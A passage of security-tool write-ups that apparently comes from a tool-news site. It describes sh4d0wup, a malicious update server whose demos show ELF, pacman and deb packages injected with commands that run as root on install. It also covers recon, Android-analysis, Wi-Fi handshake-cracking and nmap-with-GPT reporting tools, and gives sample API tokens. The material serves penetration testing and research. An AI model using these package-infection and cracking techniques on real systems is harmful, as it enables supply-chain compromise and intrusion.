    bait Start a malicious update server
    front Bind a http/https server but forward everything unmodified
    infect High level tampering, inject additional commands into a package
    tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
    keygen Generate signing keys with the given parameters
    sign Use signing keys to generate signatures
    hsm Interact with hardware signing keys
    build Compile an attack based on a plot
    check Check if the plot can still execute correctly against the configured image
    req Emulate a http request to test routing and selectors
completions Generate shell completions
    help Print this message or the help of the given subcommand(s)

    Options:
    -v, --verbose... Increase logging output (can be used multiple times)
    -q, --quiet... Reduce logging output (can be used multiple times)
    -h, --help Print help information
    -V, --version Print version information

    What are shadow updates?

Have you ever wondered whether the update you downloaded is the same one everybody else gets, or whether you got a different one that was made just for you? Shadow updates are updates that officially don't exist but carry valid signatures and would get accepted by clients as genuine. This may happen if the signing key is compromised by hackers or if a release engineer with legitimate access turns grimy.

sh4d0wup is a malicious http/https update server that acts as a reverse proxy in front of a legitimate server and can infect and sign various artifact formats. Attacks are configured in plots that describe how http request routing works, how artifacts are patched/generated, how they should be signed and with which key. A route can have selectors so it matches only if, e.g., the user-agent matches a pattern or the client is connecting from a specific IP address. For development and testing, mock signing keys/certificates can be generated and marked as trusted.
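As a rough illustration of the selector idea (not sh4d0wup's actual code, which is written in Rust and driven by plot files), the Python sketch below serves a different response body only to clients whose User-Agent matches a pattern and proxies everyone else to the legitimate upstream; all names and URLs are placeholders.

# Conceptual sketch of a "route selector": matching clients get a patched body,
# everyone else is proxied to the real server. Not sh4d0wup's implementation.
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen

UPSTREAM = "https://example.org"             # legitimate update server (placeholder)
SELECTOR = re.compile(r"special-client/.*")  # selector: only matching clients are targeted
PATCHED_BODY = b"...patched artifact bytes would go here..."

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        if SELECTOR.search(ua):
            body = PATCHED_BODY                          # shadow update for selected clients
        else:
            body = urlopen(UPSTREAM + self.path).read()  # everyone else gets the real file
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 1337), Handler).serve_forever()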

    Compile a plot

Some plots are more complex to run than others; to avoid long startup times due to downloads and artifact patching, you can build a plot in advance. This also allows signatures to be created in advance.

    sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

    Run a plot

    This spawns a malicious http update server according to the plot. This also accepts yaml files but they may take longer to start.

    sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

    You can find examples here:

    Infect an artifact

    sh4d0wup infect elf

    % sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
    [2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
    [2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
    [2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
    [2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
    % ./a.out help
    uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
    Usage: a.out [OPTIONS] <COMMAND>

    Commands:
    bait Start a malicious update server
    infect High level tampering, inject additional commands into a package
    tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
    keygen Generate signing keys with the given parameters
    sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
    build Compile an attack based on a plot
    check Check if the plot can still execute correctly against the configured image
    completions Generate shell completions
    help Print this message or the help of the given subcommand(s)

    Options:
    -v, --verbose... Turn debugging information on
    -h, --help Print help information

    sh4d0wup infect pacman

    % sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
    [2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
    % sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
    loading packages...
    resolving dependencies...
    looking for conflicting packages...

    Packages (1) sh4d0wup-0.2.0-2

    Total Installed Size: 13.36 MiB
    Net Upgrade Size: 0.00 MiB

    :: Proceed with installation? [Y/n]
    (1/1) checking keys in keyring [#######################################] 100%
    (1/1) checking package integrity [#######################################] 100%
    (1/1) loading package files [#######################################] 100%
(1/1) checking for file conflicts [#######################################] 100%
    (1/1) checking available disk space [#######################################] 100%
    :: Processing package changes...
    (1/1) upgrading sh4d0wup [#######################################] 100%
    uid=0(root) gid=0(root) groups=0(root)
    :: Running post-transaction hooks...
    (1/2) Arming ConditionNeedsUpdate...
    (2/2) Notifying arch-audit-gtk

    sh4d0wup infect deb

    % sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
    [2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
    % sudo apt install ./apt_2.2.4-1_amd64.deb
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
    Suggested packages:
    apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
    Recommended packages:
    ca-certificates
    The following packages will be upgraded:
    apt
    1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
    Need to get 0 B/1491 kB of archives.
    After this operation, 0 B of additional disk space will be used.
    Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: delaying package configuration, since apt-utils is not installed
    (Reading database ... 6661 files and directories currently installed.)
    Preparing to unpack /apt_2.2.4-1_amd64.deb ...
    Unpacking apt (2.2.4-1) over (2.2.4) ...
    Setting up apt (2.2.4-1) ...
    uid=0(root) gid=0(root) groups=0(root)
    Processing triggers for libc-bin (2.31-13+deb11u5) ...

    sh4d0wup infect oci

    Bruteforce git commit partial collisions

Here's a short one-liner that takes the latest commit from a git repository, sends it to a remote computer that has sh4d0wup installed to tweak it until the commit id starts with the provided --collision-prefix, and then inserts the new commit back into the repository on your local computer:

    % git cat-file commit HEAD | ssh lots-o-time nice sh4d0wup tamper git-commit --stdin --collision-prefix 7777 --strip-header | git hash-object -w -t commit --stdin

This may take some time; eventually it shows a commit id that you can use to create a new branch:

    git show 777754fde8...
    git branch some-name 777754fde8...
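To show what is actually being brute-forced here, the following Python sketch computes git commit object ids the same way git does and tweaks a commit body (by appending a nonce line) until the id starts with a chosen prefix. sh4d0wup's own tweaking strategy may differ; this is just the underlying idea, with an invented commit body.

# Sketch: brute-force a git commit id prefix by varying the raw commit object.
import hashlib
import itertools

def git_object_id(body, obj_type=b"commit"):
    # git hashes "<type> <size>\0<body>" with SHA-1
    return hashlib.sha1(obj_type + b" " + str(len(body)).encode() + b"\0" + body).hexdigest()

def find_partial_collision(commit_body, prefix):
    for nonce in itertools.count():
        candidate = commit_body + b"\nnonce: " + str(nonce).encode()
        oid = git_object_id(candidate)
        if oid.startswith(prefix):
            return oid, candidate

# `git cat-file commit HEAD` would supply the real commit body
body = (b"tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904\n"
        b"author A <a@example.com> 1700000000 +0000\n"
        b"committer A <a@example.com> 1700000000 +0000\n\nmessage\n")
oid, _ = find_partial_collision(body, "7777")
print(oid)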


    Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

How it works • Installation • Usage • MODES • For Developers • Credits

    Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

    SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

    In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

    SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

    [Thanks ChatGPT for the Description]


    How it Works ?

    This tool mainly performs 3 tasks

    1. Effective Subdomain Enumeration from Various Tools
    2. Get URLs with open HTTP and HTTPS service.
3. Run Nuclei and other scans on the previous output.

So basically, this is an automation script for your initial recon in bug bounty (a rough sketch of this pipeline is shown below).
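The shell script itself does considerably more, but the core pipeline can be pictured roughly like this Python sketch, which assumes subfinder, httpx and nuclei are already installed and on the PATH:

# Rough sketch of the recon pipeline the script automates:
# subdomains -> live URLs -> nuclei scan. Not scriptkiddi3's actual code.
import subprocess
import sys

def run(cmd, stdin=""):
    # run a tool, feed it the previous stage's output, return its stdout
    return subprocess.run(cmd, input=stdin, capture_output=True, text=True, check=True).stdout

def recon(domain):
    subdomains = run(["subfinder", "-silent", "-d", domain])   # 1. subdomain enumeration
    live_urls = run(["httpx", "-silent"], stdin=subdomains)    # 2. URLs with open HTTP/HTTPS
    findings = run(["nuclei", "-silent"], stdin=live_urls)     # 3. nuclei scan on the results
    print(findings)

if __name__ == "__main__":
    recon(sys.argv[1])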

    Install SCRIPTKIDDI3

SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirements:

    git clone https://github.com/thecyberneh/scriptkiddi3.git
    cd scriptkiddi3
    bash installer.sh

    Usage

    scriptkiddi3 -h

    This will display help for the tool. Here are all the switches it supports.

    [ABOUT:]
    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
    A recon and initial vulnerability detection tool built using shell script and open source tools.


    [Usage:]
    scriptkiddi3 [MODE] [FLAGS]
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    [MODES:]
    ['-m'/'--mode']
    Available Options for MODE:
    SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    URL | url Run scriptkiddi3 in URL ENUMERATION mode
    EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


Feature of EXPLOIT mode : subdomain enumeration, URL Enumeration,
Vulnerability Detection with Nuclei,
and Scan for SUBDOMAIN TAKEOVER

    [FLAGS:]
    [TARGET:] -d, --domain target domain to scan

    [CONFIG:] -c, --config path of your configuration file for subfinder

    [HELP:] -h, --help to get help menu

    [UPDATE:] -u, --update to update tool

    [Examples:]
    Run scriptkiddi3 in full Exploitation mode
    scriptkiddi3 -m EXP -d target.com


    Use your own CONFIG file for subfinder
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    scriptkiddi3 -m SUB -d target.com


    Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m URL -d target.com

    MODES

    1. FULL EXPLOITATION MODE

    Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

      scriptkiddi3 -m EXP -d target.com

    FULL EXPLOITATION MODE contains following functions

    • Effective Subdomain Enumeration with different services and open source tools
    • Effective URL Enumeration ( HTTP and HTTPs service )
    • Run Vulnerability Detection with Nuclei
    • Subdomain Takeover Test on previous results

    2. SUBDOMAIN ENUMERATION MODE

    Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

      scriptkiddi3 -m SUB -d target.com

    SUBDOMAIN ENUMERATION MODE contains following functions

    • Effective Subdomain Enumeration with different services and open source tools
• You can use this mode if you only want to get subdomains from this tool, i.e. automation of subdomain enumeration by different tools

    3. URL ENUMERATION MODE

    Run scriptkiddi3 in URL ENUMERATION MODE

      scriptkiddi3 -m URL -d target.com

    URL ENUMERATION MODE contains following functions

    • Same Feature as SUBDOMAIN ENUMERATION MODE but also identifies HTTP or HTTPS service

    Using your own CONFIG File for subfinder

      scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

You can also provide your own CONFIG file with your API keys for subdomain enumeration with subfinder.

Updating tool to latest version

You can run the following command to update the tool:

      scriptkiddi3 -u

    An Example of config.yaml

    binaryedge:
    - 0bf8919b-aab9-42e4-9574-d3b639324597
    - ac244e2f-b635-4581-878a-33f4e79a2c13
    censys:
    - ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
    certspotter: []
    passivetotal:
    - sample-email@user.com:sample_password
    securitytrails: []
    shodan:
    - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
    github:
    - ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
    - ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
    zoomeye:
    - zoomeye_username:zoomeye_password

    For Developers

    If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

    If you have any other queries, you can always contact me on Twitter(thecyberneh)

    Credits

    I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



    QuadraInspect - Android Framework That Integrates AndroPass, APKUtil, And MobFS, Providing A Powerful Tool For Analyzing The Security Of Android Applications


The security of mobile devices has become a critical concern due to the increasing amount of sensitive data being stored on them. With the rise of Android OS as the most popular mobile platform, the need for effective tools to assess its security has also increased. In response to this need, a new Android framework has emerged that combines several powerful tools - AndroPass, APKUtil, RMS, and MobFS - to conduct comprehensive vulnerability analysis of Android applications. This framework is known as QuadraInspect.

QuadraInspect is an Android framework that integrates AndroPass, APKUtil, RMS and MobFS, providing a powerful tool for analyzing the security of Android applications. AndroPass is a tool that focuses on analyzing the security of Android applications' authentication and authorization mechanisms, while APKUtil extracts valuable information from an APK file. Lastly, MobFS and RMS facilitate the analysis of an application's filesystem by mounting its storage in a virtual environment.

By combining these tools, QuadraInspect provides a comprehensive approach to vulnerability analysis of Android applications. This framework can be used by developers, security researchers, and penetration testers to assess the security of their own or third-party applications. QuadraInspect provides a unified interface for all of the integrated tools, making it easier to use and reducing the time required to conduct comprehensive vulnerability analysis. Ultimately, this framework aims to increase the security of Android applications and protect users' sensitive data from potential threats.


    Requirements

    • Windows, Linux or Mac
    • NodeJs installed
    • Python 3 installed
    • OpenSSL-3 installed
    • Wkhtmltopdf installed

    Installation

To install the tools you need to:

First: git clone https://github.com/morpheuslord/QuadraInspect

Second: Open an administrative cmd or powershell (for the MobFS setup) and run: pip install -r requirements.txt && python3 main.py

Third: Once QuadraInspect loads, run this command: QuadraInspect Main>> : START install_tools

The tools will be downloaded to the tools directory, and the setup.py and setup.bat commands will run automatically to complete the installation.

    Usage

Each module has a help function so that the commands and the descriptions are detailed and can be altered for operation.

    These are the key points that must be addressed for smooth working:

• The APK file or target must be declared before starting any attack.
• The attacks are separate entities combined via this framework; doing research on how to use them is recommended.
• The APK file can be declared either using args or using SET target within the tool.
• The target APK file must be placed in the target folder, as the tool searches for the target file within that folder.

    Modes

    There are 2 modes:

    |
    └─> F mode
    └─> A mode

    F mode

The F mode is a mode where you get the active interface for using the interactive version of the framework, with the prompt, etc.

    F mode is the normal mode and can be used easily

    A mode

A mode, or argumentative mode, takes the input via arguments and runs the commands without any intervention by the user. This is currently limited to the main menu; in the future I am planning to extend this feature to the incorporated tools as well.

    python main.py --target <APK_file> --mode a --command install_tools/tools_name/apkleaks/mobfs/rms/apkleaks

    Main Module

The main menu of the entire tool has these options and commands:

Command Description
SET target SET the name of the target file
START install_tools If not installed, this will install the tools
LIST tools_name List out the tools integrated
START apkleaks Use the APKLeaks tool
START mobfs Use MobFS for dynamic and static analysis
START andropass Use the AndroPass APK analyzer
help Display help menu
SHOW banner Display banner
quit Quit the program

    As mentioned above the target must be set before any tool is used.

    Apkleaks menu

The APKLeaks menu is also really straightforward, with only a few things to consider:

• The options SET output and SET json-out take file names, not the actual files; the output is created in the result directory.
• The SET pattern option takes the name of a JSON pattern file. The JSON file must be located in the pattern directory.
    OPTION SET Value
    SET output Output for the scan data file name
    SET arguments Additional Disassembly arguments
    SET json-out JSON output file name
    SET pattern The pre-searching pattern for secrets
    help Displays help menu
    return Return to main menu
    quit Quit the tool

    Mobfs

MobFS is pretty straightforward; only the port number must be taken care of, which is 5000 by default. You just need to start the program and connect to 127.0.0.1:5000 in your browser.

    AndroPass

AndroPass is also really straightforward: it just takes the file as input and does its job without any other inputs.

    Architecture:

    The APK analysis framework will follow a modular architecture, similar to Metasploit. It will consist of the following modules:

    • Core module: The core module will provide the basic functionality of the framework, such as command-line interface, input/output handling, and logging.
    • Static analysis module: The static analysis module will be responsible for analyzing the structure and content of APK files, such as the manifest file, resources, and code.
    • Dynamic analysis module: The dynamic analysis module will be responsible for analyzing the behavior of APK files, such as network traffic, API calls, and file system interactions.
    • Reverse engineering module: The reverse engineering module will be responsible for decompiling and analyzing the source code of APK files.
    • Vulnerability testing module: The vulnerability testing module will be responsible for testing the security of APK files, such as identifying vulnerabilities and exploits.

    Adding more

Currently there are only 3 integrated tools, but more can be added. These are the things to be considered:

    • Installer function
    • Seperate tool function
    • Main function

    Installer Function

• Must edit in the config/installer.py
• The main thing to consider in the installer is the link for the repository.
• Keep the cloner and the directory handling in a try-except block to avoid errors.
• Choose an appropriate command for further installation.

    Seperate tool function

• Must edit in the config/mobfs.py, config/androp.py, or config/apkleaks.py
• Write a new function for the specific tool
• File handling is up to you; I recommend passing the file name as an argument and then using that name to locate the file in the subprocess call
• The tool invocations should also be wrapped in a try-except block to avoid unwanted errors.

    Main Function

• A new case must be added to the switch function to act as the main function holder
• The help menu listing and commands are up to your requirements and comfort (a hypothetical sketch of these pieces is shown below)
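As a hypothetical example of the pieces described above (file paths, names and commands are made up for illustration and are not QuadraInspect's actual code), a new tool could be wired in roughly like this:

# Hypothetical example of an installer helper and a tool wrapper, following the
# guidance above. All names and paths are illustrative.
import subprocess

def install_newtool():
    # would be added to config/installer.py
    try:
        subprocess.run(["git", "clone", "https://github.com/example/newtool", "tools/newtool"], check=True)
        subprocess.run(["pip", "install", "-r", "tools/newtool/requirements.txt"], check=True)
    except subprocess.CalledProcessError as err:
        print(f"[!] installation failed: {err}")

def run_newtool(target_apk):
    # would live in its own config/newtool.py module; the APK sits in the target folder
    try:
        subprocess.run(["python", "tools/newtool/newtool.py", "--apk", f"target/{target_apk}"], check=True)
    except subprocess.CalledProcessError as err:
        print(f"[!] newtool failed on {target_apk}: {err}")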

If you want, you can make your own upgrades and add them to this repository for more people to use, helping this tool grow.



    Wifi_Db - Script To Parse Aircrack-ng Captures To A SQLite Database


Script to parse Aircrack-ng captures into a SQLite database and extract useful information like handshakes (in 22000 hashcat format), MGT identities, interesting relations between APs, clients and their probes, WPS information, and a global view of all the APs seen.

wifi_db by r4ulcl

    Features

    • Displays if a network is cloaked (hidden) even if you have the ESSID.
    • Shows a detailed table of connected clients and their respective APs.
• Identifies client probes connected to APs, providing insight into potential security risks using Rogue APs.
    • Extracts handshakes for use with hashcat, facilitating password cracking.
    • Displays identity information from enterprise networks, including the EAP method used for authentication.
    • Generates a summary of each AP group by ESSID and encryption, giving an overview of the security status of nearby networks.
    • Provides a WPS info table for each AP, detailing information about the Wi-Fi Protected Setup configuration of the network.
    • Logs all instances when a client or AP has been seen with the GPS data and timestamp, enabling location-based analysis.
• Upload captures from a folder or a single file. This option supports the use of wildcards (*) to select multiple files or folders.
    • Docker version in Docker Hub to avoid dependencies.
    • Obfuscated mode for demonstrations and conferences.
    • Possibility to add static GPS data.

    Install

    From DockerHub (RECOMMENDED)

    docker pull r4ulcl/wifi_db

    Manual installation

    Debian based systems (Ubuntu, Kali, Parrot, etc.)

    Dependencies:

    • python3
    • python3-pip
    • tshark
    • hcxtools
    sudo apt install tshark
    sudo apt install python3 python3-pip

    git clone https://github.com/ZerBea/hcxtools.git
    cd hcxtools
    make
    sudo make install
    cd ..

    Installation

    git clone https://github.com/r4ulcl/wifi_db
    cd wifi_db
    pip3 install -r requirements.txt

    Arch

    Dependencies:

    • python3
    • python3-pip
    • tshark
    • hcxtools
    sudo pacman -S wireshark-qt
    sudo pacman -S python-pip python

    git clone https://github.com/ZerBea/hcxtools.git
    cd hcxtools
    make
    sudo make install
    cd ..

    Installation

    git clone https://github.com/r4ulcl/wifi_db
    cd wifi_db
    pip3 install -r requirements.txt

    Usage

    Scan with airodump-ng

    Run airodump-ng saving the output with -w:

    sudo airodump-ng wlan0mon -w scan --manufacturer --wps --gpsd

    Create the SQLite database using Docker

    #Folder with captures
    CAPTURESFOLDER=/home/user/wifi

    # Output database
    touch db.SQLITE

    docker run -t -v $PWD/db.SQLITE:/db.SQLITE -v $CAPTURESFOLDER:/captures/ r4ulcl/wifi_db
• -v $PWD/db.SQLITE:/db.SQLITE: to save the output in the db.SQLITE file in the current folder
• -v $CAPTURESFOLDER:/captures/: to share the folder with the captures with the Docker container

    Create the SQLite database using manual installation

Once the capture is created, we can create the database by importing the capture. To do this, pass the name of the capture without the extension.

    python3 wifi_db.py scan-01

If we have multiple captures, we can load the folder that contains them directly. With -d we can rename the output database.

    python3 wifi_db.py -d database.sqlite scan-folder

    Open database

The database can be opened with any SQLite client, such as the sqlite3 command-line tool or DB Browser for SQLite. The ProbeClientsConnected view is a good example of the kind of relations stored; a small query example is shown after the table and view descriptions below.

    Arguments

    usage: wifi_db.py [-h] [-v] [--debug] [-o] [-t LAT] [-n LON] [--source [{aircrack-ng,kismet,wigle}]] [-d DATABASE] capture [capture ...]

    positional arguments:
    capture capture folder or file with extensions .csv, .kismet.csv, .kismet.netxml, or .log.csv. If no extension is provided, all types will
    be added. This option supports the use of wildcards (*) to select multiple files or folders.

    options:
    -h, --help show this help message and exit
    -v, --verbose increase output verbosity
    --debug increase output verbosity to debug
    -o, --obfuscated Obfuscate MAC and BSSID with AA:BB:CC:XX:XX:XX-defghi (WARNING: replace all database)
    -t LAT, --lat LAT insert a fake lat in the new elements
-n LON, --lon LON insert a fake lon in the new elements
    --source [{aircrack-ng,kismet,wigle}]
    source from capture data (default: aircrack-ng)
    -d DATABASE, --database DATABASE
    output database, if exist append to the given database (default name: db.SQLITE)

    Kismet

    TODO

    Wigle

    TODO

    Database

    wifi_db contains several tables to store information related to wireless network traffic captured by airodump-ng. The tables are as follows:

    • AP: This table stores information about the access points (APs) detected during the captures, including their MAC address (bssid), network name (ssid), whether the network is cloaked (cloaked), manufacturer (manuf), channel (channel), frequency (frequency), carrier (carrier), encryption type (encryption), and total packets received from this AP (packetsTotal). The table uses the MAC address as a primary key.

    • Client: This table stores information about the wireless clients detected during the captures, including their MAC address (mac), network name (ssid), manufacturer (manuf), device type (type), and total packets received from this client (packetsTotal). The table uses the MAC address as a primary key.

    • SeenClient: This table stores information about the clients seen during the captures, including their MAC address (mac), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt). The table uses the combination of MAC address and detection time as a primary key, and has a foreign key relationship with the Client table.

    • Connected: This table stores information about the wireless clients that are connected to an access point, including the MAC address of the access point (bssid) and the client (mac). The table uses a combination of access point and client MAC addresses as a primary key, and has foreign key relationships with both the AP and Client tables.

    • WPS: This table stores information about access points that have Wi-Fi Protected Setup (WPS) enabled, including their MAC address (bssid), network name (wlan_ssid), WPS version (wps_version), device name (wps_device_name), model name (wps_model_name), model number (wps_model_number), configuration methods (wps_config_methods), and keypad configuration methods (wps_config_methods_keypad). The table uses the MAC address as a primary key, and has a foreign key relationship with the AP table.

    • SeenAp: This table stores information about the access points seen during the captures, including their MAC address (bssid), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt), and timestamp (bsstimestamp). The table uses the combination of access point MAC address and detection time as a primary key, and has a foreign key relationship with the AP table.

    • Probe: This table stores information about the probes sent by clients, including the client MAC address (mac), network name (ssid), and time of probe (time). The table uses a combination of client MAC address and network name as a primary key, and has a foreign key relationship with the Client table.

    • Handshake: This table stores information about the handshakes captured during the captures, including the MAC address of the access point (bssid), the client (mac), the file name (file), and the hashcat format (hashcat). The table uses a combination of access point and client MAC addresses, and file name as a primary key, and has foreign key relationships with both the AP and Client tables.

    • Identity: This table represents EAP (Extensible Authentication Protocol) identities and methods used in wireless authentication. The bssid and mac fields are foreign keys that reference the AP and Client tables, respectively. Other fields include the identity and method used in the authentication process.

    Views

    • ProbeClients: This view selects the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe and Client tables on the MAC address and orders the results by SSID.

    • ConnectedAP: This view selects the BSSID of the connected access point, the SSID of the access point, the MAC address of the connected client device, and the manufacturer of the client device. It joins the Connected, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

    • ProbeClientsConnected: This view selects the BSSID and SSID of the connected access point, the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe, Client, and ConnectedAP tables on the MAC address of the probe, and filters the results to exclude probes that are connected to the same SSID that they are probing. The results are ordered by the SSID of the probe.

    • HandshakeAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

    • HandshakeAPUnique: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and filters the results to exclude handshakes that were not cracked by hashcat. The results are grouped by SSID and ordered by BSSID.

    • IdentityAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the identity request, the manufacturer of the client device, the identity string, and the method used for the identity request. It joins the Identity, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

    • SummaryAP: This view selects the SSID, the count of access points broadcasting the SSID, the encryption type, the manufacturer of the access point, and whether the SSID is cloaked. It groups the results by SSID and orders them by the count of access points in descending order.
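For example, these views can be queried from Python with the standard sqlite3 module. The view name comes from the descriptions above; treat the exact column names as something to verify against your own database.

# Query the ProbeClientsConnected view from the generated db.SQLITE file.
import sqlite3

con = sqlite3.connect("db.SQLITE")
con.row_factory = sqlite3.Row

# clients probing for networks other than the one they are connected to
for row in con.execute("SELECT * FROM ProbeClientsConnected LIMIT 10"):
    print(dict(row))

con.close()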

    TODO

    • Aircrack-ng

    • All in 1 file (and separately)

    • Kismet

    • Wigle

    • install

    • parse all files in folder -f --folder

    • Fix Extended errors, tildes, etc (fixed in aircrack-ng 1.6)

    • Support bash multi files: "capture*-1*"

    • Script to delete client or AP from DB (mac). - (Whitelist)

    • Whitelist to don't add mac to DB (file whitelist.txt, add macs, create DB)

    • Overwrite if there is new info (old ESSID='', New ESSID='WIFI')

• Table Handshakes and PMKID

    • Hashcat hash format 22000

    • Table files, if file exists skip (full path)

    • Get HTTP POST passwords

• DNS queries


    This program is a continuation of a part of: https://github.com/T1GR3S/airo-heat

    Author

    • RaΓΊl Calvo Laorden (@r4ulcl)

    License

    GNU General Public License v3.0



    GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


This is a Proof of Concept application that demonstrates how AI can be used to generate accurate results for vulnerability analysis, while also allowing further utilization of the already super useful ChatGPT.

    Requirements

    • Python 3.10
    • All the packages mentioned in the requirements.txt file
• OpenAI API key

    Usage

• First, change the "__API__KEY" part of the code to your OpenAI API key
openai.api_key = "__API__KEY" # Enter your API key
• Second, install the packages
pip3 install -r requirements.txt
or
pip install -r requirements.txt
• Run the code: python3 gpt_vuln.py <> (or, on Windows, python gpt_vuln.py <>)

Supported on both Windows and Linux.

    Understanding the code

    Profiles:

    Parameter Return data Description Nmap Command
    p1 json Effective Scan -Pn -sV -T4 -O -F
    p2 json Simple Scan -Pn -T4 -A -v
    p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
    p4 json Partial Intense Scan -Pn -p- -T4 -A -v
    p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

The profile is the type of scan that will be executed by the nmap subprocess. The IP or target is provided via argparse. First, the custom nmap scan is run with all the crucial arguments needed for the scan to continue. Next, the scan data is extracted from the huge pile of data produced by nmap: the "scan" object has a list of sub-data under "tcp", each labelled according to the open ports. Once the data is extracted, it is sent to the OpenAI API davinci model via a prompt. The prompt specifically asks for JSON output and describes how the data is to be used.

The entire structure of the request that has to be sent to the OpenAI API is designed in the completion section of the program.

# Imports and setup added here for completeness; the model name is the GPT-3
# Davinci model referenced above.
import nmap
import openai

openai.api_key = "__API__KEY"        # Enter your API key (see Usage above)
model_engine = "text-davinci-003"    # GPT-3 Davinci model
nm = nmap.PortScanner()

def profile(ip):
    nm.scan('{}'.format(ip), arguments='-Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln')
    json_data = nm.analyse_nmap_xml_scan()
    analize = json_data["scan"]
    # Prompt describing what the query is all about
    prompt = "do a vulnerability analysis of {} and return a vulnerability report in json".format(analize)
    # A structure for the request
    completion = openai.Completion.create(
        engine=model_engine,
        prompt=prompt,
        max_tokens=1024,
        n=1,
        stop=None,
    )
    response = completion.choices[0].text
    return response

    Advantages

• Can be used in developing more advanced systems built entirely on the API and scanner combination
• Can increase the effectiveness of the final system
• Highly productive when working with models such as GPT-3


DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Security Numbers And More From Text


